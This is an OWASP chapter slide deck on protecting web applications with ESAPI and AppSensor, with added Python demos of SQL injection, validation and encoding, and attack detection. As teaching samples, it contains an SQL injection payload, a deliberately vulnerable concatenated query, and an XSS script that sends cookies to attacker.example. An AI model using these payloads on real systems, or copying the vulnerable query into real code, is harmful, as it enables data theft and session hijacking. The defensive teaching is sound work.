Protecting Web Applications with ESAPI and AppSensor
Manuel Lopez Arredondo, manuel.lopez@owasp.org

“The cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”
http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
Why is security important? Ponemon Institute (2012). 2012 Cost of Cyber Crime Study. Ponemon Institute LLC.
Why is security important? Verizon (2012). 2012 Data Breach Investigations Report. Verizon LLC.
What is OWASP? Mission driven: Nonprofit | Worldwide | Unbiased (OWASP does not endorse or recommend commercial products or services)
What is OWASP? Community driven: 30,000 mailing list participants | 200 active chapters in 70 countries | 1600+ members | 56 corporate supporters | 69 academic supporters
OWASP Guadalajara Chapter – What do we have to offer? A community of security professionals | Monthly meetings | Mailing list | Presentations | Workshops | Open forums for discussion | Vendor-neutral environment | Active since March 2012 | https://www.owasp.org/index.php/Guadalajara
What is OWASP Quality Resources 200+ Projects 15,000+ downloads of tools, documentation 250,000+ unique visitors 800,000+ page views (monthly)
Quality Resources (chart): OWASP projects split between Tools, Code and Documentation (40% / 10% / 50%)
OWASP Top Ten (2010 Edition)
• A1: Injection
• A2: Cross-Site Scripting (XSS)
• A3: Broken Authentication and Session Management
• A4: Insecure Direct Object References
• A5: Cross-Site Request Forgery (CSRF)
• A6: Security Misconfiguration
• A7: Failure to Restrict URL Access
• A8: Insecure Cryptographic Storage
• A9: Insufficient Transport Layer Protection
• A10: Unvalidated Redirects and Forwards
SQL Injection – Illustrated
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data (the Account / SKU fields)
3. Application forwards the attack to the database in a SQL query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
4. Database runs the query containing the attack and sends the encrypted results back to the application
5. Application decrypts the data as normal and sends the results to the user: the whole DB table (Acct: 5424-6066-2134-4334, 4128-7574-3921-0192, 5424-9383-2039-4029, 4128-0004-1234-0293) instead of one account summary
(Diagram: HTTP request → firewall → hardened OS / web server / app server running the custom code → databases, legacy systems, web services, directories → HTTP response. The attack rides inside ordinary application traffic, so the network-layer firewalls and the hardened OS never see it; the application layer (finance, transactions, accounts, administration, communication, knowledge management, e-commerce, billing, human resources) is what gets hit.)
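The five steps above, as an added example that is not part of the original deck: a Python stand-in for the "custom code" box in the diagram, using an in-memory SQLite table filled with constructed account numbers. The vulnerable lookup builds the query by string concatenation exactly as in step 3, so the slide's payload ' OR 1=1-- returns every row; the parameterized lookup binds the same payload as a value and returns nothing.

```python
import sqlite3

# Constructed sample data standing in for the "Account Summary" table on the
# slide. Not taken from the original deck.
SAMPLE_ACCOUNTS = [
    ("alice", "5424-6066-2134-4334"),
    ("bob", "4128-7574-3921-0192"),
    ("carol", "5424-9383-2039-4029"),
]

# The payload shown on the slide: closes the quoted literal, adds a
# tautology, and comments out the trailing quote.
ATTACK = "' OR 1=1--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (owner TEXT, acct TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def lookup_vulnerable(conn, acct):
    """Step 3 of the slide: the request parameter is pasted into the SQL text,
    so the database parses attacker-controlled characters as SQL syntax."""
    sql = "SELECT owner, acct FROM accounts WHERE acct='" + acct + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, acct):
    """Same query with a bound parameter: whatever the caller sends is only
    ever compared as a value, never parsed as SQL."""
    sql = "SELECT owner, acct FROM accounts WHERE acct=?"
    return conn.execute(sql, (acct,)).fetchall()


def demo():
    """Run both lookups against the attack payload and one real account."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, ATTACK),
        "parameterized": lookup_parameterized(conn, ATTACK),
        "legit": lookup_parameterized(conn, "4128-7574-3921-0192"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, "->", rows)
```

The vulnerable path returns all three accounts for a request that should match none; the parameterized path returns an empty result for the payload and exactly one row for a genuine account number. The ESAPI validator discussed later is a second line of defence in front of this, not a replacement for binding parameters.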
Cross-Site Scripting – Illustrated (application with a stored XSS vulnerability)
1. Attacker sets the trap – "update my profile": the attacker enters a malicious script into a web page that stores the data on the server
2. Victim views the page – sees the attacker's profile: the script runs inside the victim's browser with full access to the DOM and cookies
3. Script silently sends the attacker the victim's session cookie
(Diagram: the stored script lives in the custom code / business functions layer – finance, transactions, accounts, administration, communication, knowledge management, e-commerce.)
Enterprise Security API – Project Leader: Chris Schmidt, Chris.Schmidt@owasp.org. Purpose: a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API (for Reboot)
ESAPI – Vision • Build a common set of security controls for today's most popular programming languages. • Keep the interfaces in common across programming languages as far as is possible and natural. • Provide at least a simple reference implementation for each security control, to serve as an example if not useful in itself. • Easily extensible. • Provide the functionality that is most often needed but lacking (or inconsistent) in the various frameworks and languages.
Using ESAPI (1 of 3) • Getting started • https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Download: http://code.google.com/p/owasp-esapi-java/ • ESAPI Cheat Sheet: https://www.owasp.org/index.php/ESAPI_Cheat_Sheet • ESAPI Swingset: http://code.google.com/p/owasp-esapi-java-swingset/
Using ESAPI (2 of 3) • Getting help • ESAPI User mailing list (focuses on Java version): https://lists.owasp.org/mailman/listinfo/esapi-user • ESAPI Developer mailing list: https://lists.owasp.org/mailman/listinfo/esapi-dev • ESAPI Project page: http://www.esapi.org/ (coming soon)
Using ESAPI (3 of 3) • Getting involved • Many other language implementations, all playing catch up • ESAPI for Java version needs help with user documentation • ESAPI 2.1 (Java) starting soon • ESAPI Swingset and Swingset Interactive → Port to use ESAPI 2.0
Enterprise Security API Existing Enterprise Security Services/Libraries
Basic ESAPI Approach – Examples • In Java:

    String input = request.getParameter("input");
    // Throws ValidationException or IntrusionException if there is a problem
    String cleaned = ESAPI.validator().getValidInput(
        "Secure input example",   // context, used in log messages
        input,
        "SafeString",             // regex spec (whitelist type name)
        200,                      // max length
        false,                    // no nulls
        true);                    // canonicalize before validating
    String safeHTML = ESAPI.encoder().encodeForHTML(cleaned);
Basic ESAPI Approach – Examples • In PHP:

    $cleanTmp = array();    // local in scope
    $cleanParams = array(); // local in scope
    $cleanTmp['username'] = ESAPI::getValidator()->getValidInput(
        "Secure input example", $input, "SafeString", 200, false, true);
    $cleanParams['username'] = ESAPI::getEncoder()->encodeForHTML($cleanTmp['username']);
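The validate-then-encode pattern from the Java and PHP snippets, applied to the stored-XSS "update my profile" page from the earlier slide. This is an added Python illustration, not ESAPI code: get_valid_input mirrors the argument order of ESAPI's getValidInput, but the SafeString regex and the "more than one decoding pass means an attack" rule are assumptions standing in for what ESAPI reads from ESAPI.properties and does in its canonicalizer, and classify is a helper for exercising it.

```python
import html
import re
import urllib.parse


class ValidationError(Exception):
    """Input failed the whitelist (ESAPI raises ValidationException here)."""


class IntrusionError(ValidationError):
    """Input was deliberately obfuscated, e.g. double encoded
    (ESAPI raises IntrusionException here)."""


# Hypothetical whitelist types, in the role of the Validator.* regexes that
# ESAPI loads from ESAPI.properties. The pattern itself is an assumption.
PATTERNS = {
    "SafeString": re.compile(r"[A-Za-z0-9 ._\-]*"),
}


def canonicalize(value):
    """Strip URL and HTML-entity encoding until the string stops changing.
    Browsers encode once, so needing a second pass means someone layered
    encodings to sneak past a filter: treat it as an intrusion."""
    passes = 0
    current = value
    while True:
        decoded = html.unescape(urllib.parse.unquote(current))
        if decoded == current:
            break
        passes += 1
        current = decoded
    if passes > 1:
        raise IntrusionError("multiple encoding detected in %r" % value)
    return current


def get_valid_input(context, value, type_name, max_length, allow_null, do_canonicalize):
    """Same argument order as ESAPI's Validator.getValidInput, re-implemented here."""
    if not value:
        if allow_null:
            return ""
        raise ValidationError("%s: a value is required" % context)
    if do_canonicalize:
        value = canonicalize(value)
    if len(value) > max_length:
        raise ValidationError("%s: longer than %d characters" % (context, max_length))
    if not PATTERNS[type_name].fullmatch(value):
        raise ValidationError("%s: not a valid %s" % (context, type_name))
    return value


def encode_for_html(value):
    """Output encoding for HTML body and quoted attribute context."""
    return html.escape(value, quote=True)


def render_profile(display_name):
    """The profile page from the XSS slide done right: validate on the way in,
    encode on the way out. Either control alone would stop the slide's attack;
    together they also cover data that reached the store by another route."""
    cleaned = get_valid_input("profile name", display_name, "SafeString", 200, False, True)
    return "<p>Profile of " + encode_for_html(cleaned) + "</p>"


def classify(display_name):
    """Helper: report what the controls did with one input."""
    try:
        return ("rendered", render_profile(display_name))
    except IntrusionError:
        return ("intrusion", None)
    except ValidationError:
        return ("rejected", None)


# Constructed inputs: a real user, the slide's cookie-stealing script, and a
# script URL-encoded twice to slip past a filter that decodes only once.
SAMPLES = [
    "Manuel Lopez",
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
    "%253Cscript%253Ealert(1)%253C/script%253E",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s))
```

The plain name renders, the script is rejected by the whitelist, and the double-encoded script is reported as an intrusion rather than a mere validation failure, which is the distinction the ESAPI snippets' "ValidationException or IntrusionException" comment refers to and the hook AppSensor builds on later in the deck.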
OWASP ESAPI Project Scorecard (table): Feature Set vs. Programming Language
Source Code and Javadoc – Online Now! http://code.google.com/p/owasp-esapi-java
AppSensor Project Leader(s): Michael Coates, John Melton, Colin Watson Purpose: Defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. Release: AppSensor 0.1.3 - Nov 2010 (Tool) & September 2008 (doc) https://www.owasp.org/index.php/AppSensor Create attack aware applications
Detecting Attacks the Right Way • Detect INSIDE the Application • Automatic Detection • Comprehensive • Minimize False Positives • Understand Business Logic • Immediate Response • No Manual Efforts Required
Implementing AppSensor (diagram): Detection Points inside the application → Application Log Server → AppSensor "Brain" → Response Listener
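How those four pieces fit together, as an added Python example rather than the AppSensor project's own code: the application emits detection-point events into a log, the "brain" counts them per user inside a sliding time window, and a response listener escalates (log, warn the user, log them out, lock the account) each time a threshold is crossed. The detection-point names, thresholds, response ladder and log lines are all constructed for this example; a real deployment tunes them to its own business logic, which is where the "minimize false positives" bullet above is won or lost.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical detection points: how many events from one user inside the
# window trip a response. Thresholds are the false-positive dial.
DETECTION_POINTS = {
    "AuthFailure": {"threshold": 5, "window_s": 300},
    "InputValidationFailure": {"threshold": 3, "window_s": 60},
    "ForcedBrowsing": {"threshold": 1, "window_s": 60},  # URL the user was never shown
}

# Response ladder: each time a user trips any detection point, move up one rung.
RESPONSES = ["log", "warn_user", "logout", "lock_account"]


class AppSensorBrain:
    def __init__(self):
        self.events = defaultdict(deque)   # (user, dp) -> timestamps inside the window
        self.rung = defaultdict(int)       # user -> index of the next response
        self.actions = []                  # what the response listener was told to do

    def add_event(self, user, dp, ts):
        cfg = DETECTION_POINTS[dp]
        window = self.events[(user, dp)]
        window.append(ts)
        cutoff = ts - timedelta(seconds=cfg["window_s"])
        while window and window[0] < cutoff:  # slide stale events out
            window.popleft()
        if len(window) < cfg["threshold"]:
            return None
        window.clear()                         # count afresh after responding
        action = RESPONSES[min(self.rung[user], len(RESPONSES) - 1)]
        self.rung[user] += 1
        self.actions.append((user, dp, action))
        return action

    def is_locked(self, user):
        return any(u == user and a == "lock_account" for u, _, a in self.actions)


# Constructed log lines, in the shape the application log server would receive.
SAMPLE_LOG = """\
2013-04-02T10:00:00 user=alice dp=AuthFailure
2013-04-02T10:00:05 user=alice dp=AuthFailure
2013-04-02T10:00:10 user=mallory dp=AuthFailure
2013-04-02T10:00:11 user=mallory dp=AuthFailure
2013-04-02T10:00:12 user=mallory dp=AuthFailure
2013-04-02T10:00:13 user=mallory dp=AuthFailure
2013-04-02T10:00:14 user=mallory dp=AuthFailure
2013-04-02T10:01:00 user=mallory dp=InputValidationFailure
2013-04-02T10:01:01 user=mallory dp=InputValidationFailure
2013-04-02T10:01:02 user=mallory dp=InputValidationFailure
2013-04-02T10:02:00 user=mallory dp=ForcedBrowsing
2013-04-02T10:03:00 user=mallory dp=InputValidationFailure
2013-04-02T10:05:00 user=mallory dp=InputValidationFailure
2013-04-02T10:05:01 user=mallory dp=InputValidationFailure
2013-04-02T10:05:02 user=mallory dp=InputValidationFailure
"""


def parse_line(line):
    """'<iso timestamp> user=<name> dp=<detection point>' -> (user, dp, datetime)."""
    ts_text, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return kv["user"], kv["dp"], datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%S")


def run(log_text):
    """Feed every log line to the brain and return it for inspection."""
    brain = AppSensorBrain()
    for line in log_text.splitlines():
        if line.strip():
            brain.add_event(*parse_line(line))
    return brain


if __name__ == "__main__":
    for user, dp, action in run(SAMPLE_LOG).actions:
        print(f"{user}: {dp} -> {action}")
```

Alice's two failed logins never reach the threshold, so she sees nothing. Mallory's five failures are only logged, but the later validation failures and the forced-browsing attempt climb the ladder, and the lone failure at 10:03 has already slid out of the 60-second window by the time the burst at 10:05 arrives, so it is that burst alone that locks the account. Everything happens inside the application with no analyst in the loop, which is the "immediate response, no manual effort" point of the previous slide.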
Takeaways • Open source solutions • Low cost and low effort • Get development teams to think outside the box • Techniques already used in the industry • OWASP Google Summer of Code 2013: https://www.owasp.org/index.php/GSoC
About OWASP • Online since December 1st 2001 • Not-for-profit charitable organization • OPEN Everything at OWASP is radically transparent from our finances to our code. • INNOVATION OWASP encourages and supports innovation/experiments for solutions to software security challenges. • GLOBAL Anyone around the world is encouraged to participate in the OWASP community. • INTEGRITY OWASP is an honest and truthful, vendor agnostic, global community. • https://www.owasp.org/index.php
Application Developers • New attack / defense guidelines • Cheat Sheets • WebGoat: a deliberately insecure application designed to teach web application security lessons
Application Testers and Quality Assurance • Testing Guide • Penetration testing tools • Application Security Verification Standard Project
OWASP Testing Framework 4. Web Application Penetration Testing • 4.2 Information Gathering • 4.3 Configuration Management Testing • 4.4 Business logic testing • 4.5 Authentication Testing • 4.6 Authorization Testing • 4.7 Session Management Testing • 4.8 Data Validation Testing • 4.9 Testing for Denial of Service • 4.10 Web Services Testing • 4.11 Ajax Testing http://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents
Application Project Management and Staff • Define the process (SDLC) • Code Review • Code review tools: http://codecrawler.codeplex.com/Release/ProjectReleases.aspx and http://orizon.sourceforge.net
Download Get OWASP Books
Business advantages of being associated with OWASP • The main benefit of becoming an OWASP corporate supporter is to demonstrate the organization's belief that application security is important and that it is taking the necessary steps to properly address application security risk in its business • The organization itself gets security benefits at reduced cost • Security code review tools are free • Lots of open and free security testing tools • Security guidelines and best practices • Opportunity to display the organization's logo at OWASP events, conferences and on the website • The organization gets listed as a sponsor in the newsletter that goes to over 20,000 individuals around the world on the OWASP mailing lists and LinkedIn group • If you are looking to expand your business in an emerging market, here is an opportunity to reach out • When an organization supports a security community it helps employees, partners, suppliers and customers understand the value and importance of security, and improves application security throughout the whole supply chain • Membership options: https://www.owasp.org/index.php/Membership
Join Us! Subscribe to the mailing list: https://www.owasp.org/index.php/Guadalajara – Chapter Leaders: Eduardo Cerna, Manuel Lopez
AppSensor Design (diagram): Demo App with embedded AppSensor → App Logs → AppSensor "Brain" → Response